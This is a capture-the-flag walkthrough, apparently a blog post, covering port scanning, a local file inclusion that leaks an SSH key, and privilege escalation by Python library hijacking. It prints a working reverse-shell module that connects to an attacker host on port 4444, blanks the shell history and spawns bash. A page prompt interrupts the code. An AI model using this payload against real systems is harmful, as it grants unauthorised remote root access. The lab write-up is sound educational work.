Difficulty: Medium/Hard

NMAP:

Nice some ports re opens, and ssh is on port: 52846 , let’s browse

But nothing interesting here, we noticee that port 52845 is http, let’s browse

Now let’s enumerate the browser and we can found something interesting.

Let’s move on “Contact us” , we can write so, we can do a command injection?

LFI:

Nice and we have username!

And we have the KEY!!!!!! Save it in file id_rsa and give the permission: chmod 600 id_rsa and let’s login in ssh!!

GOT FIRST FLAG!! Now let’s enumerate!

User Enumeration:

We find the file “backup.py” at this moment i stuck! but thank you google! i found how to bypass this step!

Privilege Escalation:

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/
import os
import pty
import socket
Get N0t0d4y’s stories in your inbox
Join Medium for free to get updates from this writer.
lhost = “10.2.0.3”
lport = 4444
ZIP_DEFLATED = 0
class ZipFile:
def close(*args):
return
def write(*args):
return
def __init__(self, *args):
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv(“HISTFILE”,’/dev/null’)
pty.spawn(“/bin/bash”)
s.close()
After creating our script, give execute permission chmod +x zipfile.py and listen on the netcat!
We notice that file “backup.py” execute always every one minutes! So just listen on the port!